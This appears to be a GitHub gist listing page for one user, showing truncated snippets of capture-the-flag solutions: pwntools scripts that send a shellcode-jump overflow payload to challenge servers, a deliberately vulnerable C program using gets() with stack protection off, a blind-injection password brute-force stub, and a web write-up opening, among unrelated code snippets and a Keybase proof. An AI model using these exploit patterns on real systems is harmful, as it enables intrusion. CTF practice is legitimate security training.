becojo

from pwn import *
context.arch = 'amd64'
elf = ELF('./pwn150')
# p = process('tee i | ./pwn150', shell=True)
p = remote("54.153.19.139", 5253)
offset = 88
from pwn import *
# p = process('tee i | ./pwn100', shell=True)
p = remote("54.153.19.139",5251)
calleax = 0x08048386
payload = asm("jmp $+32")
payload = payload.ljust(32 - 4)
payload += p32(calleax)
// gcc -fno-stack-protector -z execstack overflow.c -o overflow
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[200];
printf("%p\n", &buf);
gets(buf);

Keybase proof

I hereby claim:

  • I am becojo on github.
  • I am becojo (https://keybase.io/becojo) on keybase.
  • I have a public key ASDdAmE0DZMvcJtrbYQh4avfIgjYG5KNDc-2o4Ug8s3Y4Ao

To claim this, I am signing this object:

becojo / blind.rb
Created September 5, 2016 00:30
Tokyo Westerns / MMA | Get the admin password!
require 'http'
charsets = {
'[A-M]' => ('A'..'M').to_a,
'[N-Z]' => ('N'..'Z').to_a,
'[a-m]' => ('a'..'m').to_a,
'[n-z]' => ('n'..'z').to_a,
'[0-9]' => ('0'..'9').to_a,
'[_\-\?!#$%]' => ["_", "-", '\?', '!', '#', '$', '%']
}
becojo / golf.pl
Created December 15, 2015 18:40
Hacklu CTF 2015 - Perl Golf
print$ARGV[0]=~s/(\w\W*\w)/ucfirst$1/egr;
becojo / MMA CTF 2015 - Login As Admin!(2).md
Created September 11, 2015 19:37
MMA CTF 2015 - Login As Admin!(2)

Login As Admin!(2)

http://login2.chal.mmactf.link/ Web 200 points

This challenge, at first, didn't seem vulnerable. Using the test credentials that were provided, we see that a random token is assigned to the user in a cookie named ss.

I finally stumbled onto something interesting when I submitted a request with the cookie ss present but with an empty value.

$ curl "http://login2.chal.mmactf.link/" --cookie "ss="

#!/usr/bin/env ruby
require 'canal'
if ARGV.empty?
puts %q{usage: hexdump [hex hex hex ...]}
else
puts ARGV.map(&canal.chars
.each_slice(2)
.to_a
{-# LANGUAGE FlexibleInstances, IncoherentInstances #-}
import Control.Monad
data Id a = Id a
deriving Show
instance Monad Id where
(Id x) >>= f = f x
return = Id
defmodule Utils do
def fix(f, x) do
f.(&(fix(f, &1)), x)
end
def fix(f) do
fn x ->
fix(f, x)
end
end